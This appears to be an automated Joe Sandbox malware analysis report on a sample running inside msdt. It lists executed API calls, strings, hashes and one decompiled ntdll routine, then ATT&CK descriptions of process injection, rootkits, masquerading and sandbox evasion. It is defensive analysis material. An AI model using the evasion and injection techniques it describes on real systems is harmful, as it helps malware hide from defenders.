Function 04B096D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B096DA

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
Instruction ID: 7809820b4d748bcbf79e03d33d1142efe8ac550b43a6d02a761c8e62251b9189
Opcode Fuzzy Hash: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
Instruction Fuzzy Hash: EF90027220105842F20061594404B460409D7E0345F91C46AA0115655D8655E8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04B09660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0966A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
Instruction ID: 615b8a8342c47465eb7781b76c8f5bdc218ffda24826372951cc019352ff1973
Opcode Fuzzy Hash: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
Instruction Fuzzy Hash: 6F90027220105802F2807159440464A0409D7D1345FD1C469A0016655DCA55EA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04B09650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0965A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
Instruction ID: 64be197c74f0823c0fa35e8d8cd17716ae694a09c8557d29eaf97282cc539f18
Opcode Fuzzy Hash: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
Instruction Fuzzy Hash: 1D90027220509842F24071594404A460419D7D0349F91C465A0055695D9665ED65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04B09A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B09A5A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
Instruction ID: 47b3e3309cf49f5da4e07aa205e24e10dee13f6268ad02dfcae301c33212f093
Opcode Fuzzy Hash: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
Instruction Fuzzy Hash: 8590026221185042F30065694C14B070409D7D0347F91C569A0145555CC955E8716561

Uniqueness

Uniqueness Score: -1.00%

Function 04B09780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0978A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
Instruction ID: b8a82f632fa56bf72cb7868dab52028a12b6c00b866e88fc85083968371cbf2d
Opcode Fuzzy Hash: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
Instruction Fuzzy Hash: 9490026A21305002F2807159540860A0409D7D1246FD1D869A0006559CC955E8796361

Uniqueness

Uniqueness Score: -1.00%

Function 04B09FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B09FEA

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
Instruction ID: 023be3e3441bce2b6c47db4864c94f0b8ccdfc22a3f1e7248344157531fa3f18
Opcode Fuzzy Hash: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
Instruction Fuzzy Hash: 0290027231119402F210615984047060409D7D1245F91C865A0815559D86D5E8A17162

Uniqueness

Uniqueness Score: -1.00%

Function 04B09710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0971A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
Instruction ID: a83871d2278dfccabf9281bcc1d791c57444d44abaeea8f0d29d57642b5e6f32
Opcode Fuzzy Hash: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
Instruction Fuzzy Hash: 5B90027220105402F200659954086460409D7E0345F91D465A5015556EC6A5E8A17171

Uniqueness

Uniqueness Score: -1.00%

Function 00599070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00599118

Strings

wininet.dll, xrefs: 005990CE, 005990D7
net.dll, xrefs: 005990E1, 00599167, 0059913F, 0059914B, 00599173

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
Instruction ID: ce3d63244fb79cd0b29df129b2f450c0366c15121b4685845a21ba8fcb31584c
Opcode Fuzzy Hash: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
Instruction Fuzzy Hash: BA31A672500705BBDB24DF64C889F67BBB8FB88B00F10851DF62E5B245D734A950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00599067 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00599118

Strings

wininet.dll, xrefs: 005990CE, 005990D7
net.dll, xrefs: 005990E1, 0059913F, 0059914B

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 16a58c6aa7fc799d4780ee64178f0ab9a175ae15235f76be7bd630a6c1d7706f
Instruction ID: 2333b8f7b9dc6d43709becea4fb43298ed80d60cbdde0e8f4f6729913915d9ac
Opcode Fuzzy Hash: 16a58c6aa7fc799d4780ee64178f0ab9a175ae15235f76be7bd630a6c1d7706f
Instruction Fuzzy Hash: 4431D571900206BBDB24DF68C889FABBBB4FF88704F10841DF6296B245C774A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0059A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00583AF8), ref: 0059A68D

Strings

.z`, xrefs: 0059A67C, 0059A688

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 5247282cd1b1f16a31c03036eee450bb784a7f6118d4465e2b08ab2b910b5f56
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: A5E01AB52002046BDB14DF59CC49EA777ACAF88750F014554B91C57241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0059A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EY,?,00594C9F,00594C9F,?,00594526,?,?,?,?,?,00000000,00000000,?), ref: 0059A64D

Strings

&EY, xrefs: 0059A642, 0059A64C

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EY
API String ID: 1279760036-1547219280
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 4bb2d7550c91e92d6de50d81864673c049d9f89b1bbf899789960e18a13e10ce
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 49E012B6200208ABDB14EF99CC85EA777ACAF88754F118558BA1C5B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00588310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0058836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0058838B

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: aaba508904d50aa33e32dfd38ba93b0203960519ee2e09c08697ecda0993b0fb
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: E6018431A8022977EB21B6949C07FBE7B6CBB40F50F040115FF04BA1C2EA946D0647E6

Uniqueness

Uniqueness Score: -1.00%

Function 00599198 Relevance: 1.6, APIs: 1, Instructions: 117threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0058F040,?,?,00000000), ref: 005991DC

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e3fb6a1eaa9e608ab8dbf360d5fcfd057221313f7c6d2e9b0f09d5b8361e8bda
Instruction ID: 52c05535cbb637fe1977bbbef547c33b5be8d00cc3f046b0771a53d41d239744
Opcode Fuzzy Hash: e3fb6a1eaa9e608ab8dbf360d5fcfd057221313f7c6d2e9b0f09d5b8361e8bda
Instruction Fuzzy Hash: ED41A1B6600706ABDB28DF78DC85FE7B7A8BF84700F040519F56997281CB70B924CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0058ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0058AD52

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: c791559bfedac54a3b99f167d234ba9d9ab76acbbfcba8090556fc89bc186bde
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: DA015EB5D4020EABEF10EBA4DD46F9DBB78AB54308F0041A5ED08A7241F671EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0059A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0059A724

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 7a539360720147e3a18fa65169cd83c0d5f6a33b4f748856fc588a4e85ff30b9
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3301B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0059A6CD Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0059A724

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 7f45e1c73b4783e104718af116f4921e4eaf169cdca1fe534bd6f8690c067df3
Instruction ID: d600f8739203d45b948f88ebc600f17407bd4aeba891f75cbf30c55357b24ea4
Opcode Fuzzy Hash: 7f45e1c73b4783e104718af116f4921e4eaf169cdca1fe534bd6f8690c067df3
Instruction Fuzzy Hash: 2D01AFB6210108AFCB54DF89DC84EEB77ADAF8C354F158248FA0D97245C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005991A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0058F040,?,?,00000000), ref: 005991DC

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cc6ba79f7baebd1dc24863936c8c635db9877f7ae517f3169b85bd93a626eedd
Instruction ID: 236c0c0bc138807b59fdf171811648d3ff14aa55a1d419f6d432d359df9a6580
Opcode Fuzzy Hash: cc6ba79f7baebd1dc24863936c8c635db9877f7ae517f3169b85bd93a626eedd
Instruction Fuzzy Hash: C0E06D373912043AEA306599AC02FA7B79CAB81B20F14002AFA0DEB2C1D595F80146A5

Uniqueness

Uniqueness Score: -1.00%

Function 0058ACD4 Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0058AD52

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
Instruction ID: 4dcde146063ba4dd620bae4553a83d7032330a48cbb9d3b031f8a77b37dcff2b
Opcode Fuzzy Hash: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
Instruction Fuzzy Hash: 5EF0B471D4010EABEF00DA94D842FDDBBB4AB54309F0082D5ED1CDB240F1709A188741

Uniqueness

Uniqueness Score: -1.00%

Function 0059A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0058F1C2,0058F1C2,?,00000000,?,?), ref: 0059A7F0

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: ab1ff5f389d40f4cab8798a526c39ae243e57da345146b76e2fd32b1b68c31d8
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: ABE01AB52002086BDB10DF49CC85EE737ADAF89750F018154BA0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0058F6B7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00588D14,?), ref: 0058F6EB

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b511b2bf0bfbf690b5e5f8e155b64c5a4ed8573599fc8832fea0d273f6befb68
Instruction ID: 2355aa97187c02336f3ae30e3b101fce1c462368ba18e284ccef326e68f01056
Opcode Fuzzy Hash: b511b2bf0bfbf690b5e5f8e155b64c5a4ed8573599fc8832fea0d273f6befb68
Instruction Fuzzy Hash: 34E0C2856A83812AE710AAF45D03F173F941711744F2906B8A488AF183D818C0061336

Uniqueness

Uniqueness Score: -1.00%

Function 0058F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00588D14,?), ref: 0058F6EB

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: e06e6af9547203f630f377cb9600ef824879951a4c6343eb5f60b9e08fc24e0e
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: C7D0A7727503043BEA10FAE59C07F2637CC7B44B04F490074F948E73C3E954E8014665

Uniqueness

Uniqueness Score: -1.00%

Function 04B0967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B09694

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
Instruction ID: 19a7c12f2018f14f601814bec95284a66011731a66ca95b090792b4ac396b921
Opcode Fuzzy Hash: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
Instruction Fuzzy Hash: 74B09BB29014D5C5F711D76046087177D04F7D0745F56C5A5D1020645B4778E091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B5FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04b5fdda
0x04b5fde2
0x04b5fde5
0x04b5fdec
0x04b5fdfa
0x04b5fdff
0x04b5fe0a
0x04b5fe0f
0x04b5fe17
0x04b5fe1e
0x04b5fe19
0x04b5fe19
0x04b5fe19
0x04b5fe20
0x04b5fe21
0x04b5fe22
0x04b5fe25
0x04b5fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B5FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B5FE2B

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
Instruction ID: d00cd1b4e69d074f5c794ac4cfe881c38314a4255791ce421afad2a924c4fe8c
Opcode Fuzzy Hash: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
Instruction Fuzzy Hash: FEF0F032200201BFEA251A45DC06F73FF6AEB84730F244395FA68561E1EA62F86096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
